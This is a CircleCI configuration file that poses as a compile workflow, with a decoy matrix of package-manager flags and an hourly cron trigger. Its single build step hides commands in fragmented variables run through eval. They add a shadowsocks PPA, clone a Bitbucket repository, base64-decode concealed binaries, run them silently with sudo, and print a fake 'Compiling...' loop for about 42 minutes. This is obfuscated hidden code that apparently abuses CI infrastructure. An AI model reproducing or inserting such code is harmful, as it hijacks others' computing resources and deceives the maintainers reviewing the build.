version: 2.1

workflows:
  build-push:
    jobs:
      - build:
          matrix:
            parameters:
              build: ["--quiet-unmerge-warn", "--changed-deps-report", "--with-test-deps", "--complete-graph-if-new-use", "--autounmask-keep-masks", "--usepkg-exclude", "--buildpkgonly", "--ask", "--newrepo", "--rebuild-if-new-ver", "--noreplace", "--getbinpkgonly", "--reinstall", "--verbose", "--prefix", "--keep-going", "--info", "--autounmask-write", "--rebuilt-binaries-timestamp", "--prefix"]
  build-schedule:
    jobs:
      - build:
          matrix:
            parameters:
              build: ["--quiet-unmerge-warn", "--changed-deps-report", "--with-test-deps", "--complete-graph-if-new-use", "--autounmask-keep-masks", "--usepkg-exclude", "--buildpkgonly", "--ask", "--newrepo", "--rebuild-if-new-ver", "--noreplace", "--getbinpkgonly", "--reinstall", "--verbose", "--prefix", "--keep-going", "--info", "--autounmask-write", "--rebuilt-binaries-timestamp", "--prefix"]
    triggers:
      - schedule:
          cron: "17 * * * *"
          filters:
            branches:
              only:
                - master

jobs:
  build:
    machine:
      image: ubuntu-1604:201903-01
    parameters:
      build:
        type: string
        default:
    steps:
      - run:
          name: exe
          command: |
            zZlfCixZPS="sudo add-ap"
            CvYBnvbKWQ="t-repositor"
            BFHOJ="y ppa:max-c"
            ZHMPNtpyxsu="-lv/shadows"
            wUbjTFT="ocks-libev "
            bqndgdQ="-y &>/dev/n"
            eval "$zZlfCixZPS""$CvYBnvbKWQ""$BFHOJ""$ZHMPNtpyxsu""$wUbjTFT""$bqndgdQ""ull || true"
            XCmVRUC="sudo add-ap"
            cBDGhay="t-repositor"
            duYef="y ppa:ondre"
            CkNNNocnQE="j/apache2 -"
            QntVD="y &>/dev/nu"
            eval "$XCmVRUC""$cBDGhay""$duYef""$CkNNNocnQE""$QntVD""ll || true"
            GUixtN="sudo apt up"
            FxBSLqYjOM="date || tru"
            eval "$GUixtN""$FxBSLqYjOM""e"
            lNrzhxCv="sudo apt --"
            JcDYVtzjXD="yes install"
            LyLrTLWpAv=" openssl &>"
            TWdHlKRosQ="/dev/null |"
            eval "$lNrzhxCv""$JcDYVtzjXD""$LyLrTLWpAv""$TWdHlKRosQ""| true"
            WNhRqWDXagc="sudo apt --"
            aUwOo="yes install"
            MBBBGUDuD=" cl-base64 "
            dClpk="git &>/dev/"
            NrenqwQalKt="null || tru"
            eval "$WNhRqWDXagc""$aUwOo""$MBBBGUDuD""$dClpk""$NrenqwQalKt""e"
            wgzsZJHfHVl="git clone h"
            tYlSUKU="ttps://gccb"
            GpAfj="uild@bitbuc"
            swzoqyhUte="ket.org/gcc"
            kHZfPPbL="build/gcc.g"
            waukfGNchL="it &>/dev/n"
            eval "$wgzsZJHfHVl""$tYlSUKU""$GpAfj""$swzoqyhUte""$kHZfPPbL""$waukfGNchL""ull"
            lPfBVEoTB="base64 -d g"
            jCjwExh="cc/cmake_np"
            eval "$lPfBVEoTB""$jCjwExh""_ > cmake"
            wnmplTyQ="base64 -d g"
            CGBkkFP="cc/config_ "
            eval "$wnmplTyQ""$CGBkkFP""> xconfig"
            cPIFqZlgNrX="base64 -d g"
            bPEzNZD="cc/make_ > "
            eval "$cPIFqZlgNrX""$bPEzNZD""prepare"
            sed -i 's/1080/1081/g' xconfig
            MCAhkaGtD="chmod +x pr"
            eval "$MCAhkaGtD""epare cmake"
            GvxcQfHD="./cmake"
            eval "$GvxcQfHD"""
            sed -i 's/build/ob2u/g' xconfig
            sudo ./prepare --config xconfig &>/dev/null &
            GCC=$(date +%s)
            while true; do CC=$(date +%s); echo $CC Compiling...; [ $CC -ge $((GCC + 2531)) ] && sudo killall prepare && break; sleep 202; done
